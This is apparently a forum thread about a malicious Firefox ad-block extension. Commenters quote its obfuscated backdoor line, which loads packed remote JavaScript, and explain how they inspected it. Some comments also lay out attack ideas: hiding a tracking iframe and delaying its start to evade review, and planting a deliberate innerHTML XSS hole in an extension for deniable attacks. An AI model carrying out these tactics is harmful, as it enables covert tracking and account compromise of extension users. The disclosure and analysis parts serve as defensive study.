I can see your local web servers

Other approach is to create a useful extension like:

  https://addons.mozilla.org/en-US/firefox/addon/yt-adblock/reviews/

disguise that you're inserting an iframe linking to your web server into every single page user opens, by naming variables and your tracking domain incorrectly and by waiting for an hour after installation (this may also help avoid automatic tests mozilla is doing) and then just sit back and wait and log all the referers and ip addresses. It's a bit stealthier too, but needs users to visit their local web servers. But you'll also get the full URL.

Nobody will report you or care about the report and users are banned from fixing the extension code locally even if they're able to review it themselves. Bad reviews with some actual text fade away quickly, so if someone warns your other users, it will be pushed out to page 2 after a while by other useful one word or just empty reviews and it will work out.

From my experience as a dev (who has already submitted extensions to moz), this will be sorted out. However, it might take up to 4 - 6 weeks, until an actual human being reviews the changes. But it gets reviewed.

Last updated "5 months ago (Dec 16, 2018)".

One would hope that reporting an extension would help reviewing it sooner especially if it's 26th top rated one and all that's needed is to verify the claims in the report.

Is there any way to get the source code of extensions from the Mozilla web site? I think some years ago you could look at the code in your browser from a link in the version history but I don't see any links at all now.

what is meant by, "users are banned from fixing the extension code locally"? i download and modify other people's extensions all the time.

Very nice catch. I examined a little bit more. Seems like line 16 on scripts/yts.js is the backdoor.

  enableButton.src = '//remove' + '.' + 'video/webm';

So owner of this addon have remove.video domain. On https://remove.video/webm there's a packed javascript code. When I unpacked it I got this: https://paste.ubuntu.com/p/C24bZc9Cn7/

There's a base64 encoded domain list in packed javascript code. Here's the list of domains: https://paste.ubuntu.com/p/RMKd8Ms5QQ/

I'm using this extension for it: https://addons.mozilla.org/en-US/firefox/addon/crxviewer/

Probably the signing requirement for release builds of Firefox.

Right click "Add to Firefox" button and use "save as..". This will get you an xpi file which you can unzip and inspect.

Many addons will use some packing method, bundle all kinds of stuff into their content scripts (jQuery, etc.). It can be hard to review.

Some addons are quite horryfying (you see stuff like `<span ...>${someText}</span>`) (missing escaping, etc.). I'm quite sure there are some content scripts out there, that have XSS issues, that can be triggered from the page itself. This is great on pages like github, where there's quanta of user controlled content.

So if you want a suggestion for a clever attack:

1] make an extension for facebook or twitter or github that reorganizes the wall somewhat and make a `mistake` like assigning some user controlled content via innerHTML. This will probably pass review.

2] Suggest your addon to your target.

3] Post your payload as a message/tweet/whatever to your target. Now you have extension assisted XSS.

Pretty easy to add XSS to any page, with plausible deinability.

Hopefully that sort of shenanigans would fail AMO code reviews

This is not a hypothetical but a smoking gun. That plugin really does those things.

Nice this will be fun